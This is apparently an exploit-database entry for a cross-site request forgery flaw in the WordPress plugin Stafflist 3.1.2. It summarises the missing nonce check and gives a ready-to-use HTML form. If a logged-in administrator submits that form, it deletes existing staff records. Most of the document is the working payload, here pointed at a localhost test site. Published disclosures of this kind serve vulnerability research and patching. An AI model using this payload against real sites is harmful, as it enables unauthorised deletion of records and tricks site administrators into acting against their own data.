# Exploit Title: WordPress Plugin stafflist 3.1.2 - CSRF (Authenticated) # Date: 05-02-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/stafflist/ # Version: 3.1.2 # Tested on: Firefox # Contact me: h [at] spidersilk.com # Summary: A CSRF vulnerability exists in staff record remove functionality in WordPress Plugin Stafflist 3.1.2. This vulnerability allows an attacker to delete existing records by triggring a CSRF html request, due to not validating wp_nouce token in the request. # Exploit As n authenticated user: <html> <body> <form action="http://localhost:10003/wp-admin/admin.php"> <input type="hidden" name="page" value="stafflist" /> <input type="hidden" name="remove" value="1" /> <input type="hidden" name="p" value="1" /> <input type="hidden" name="s" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>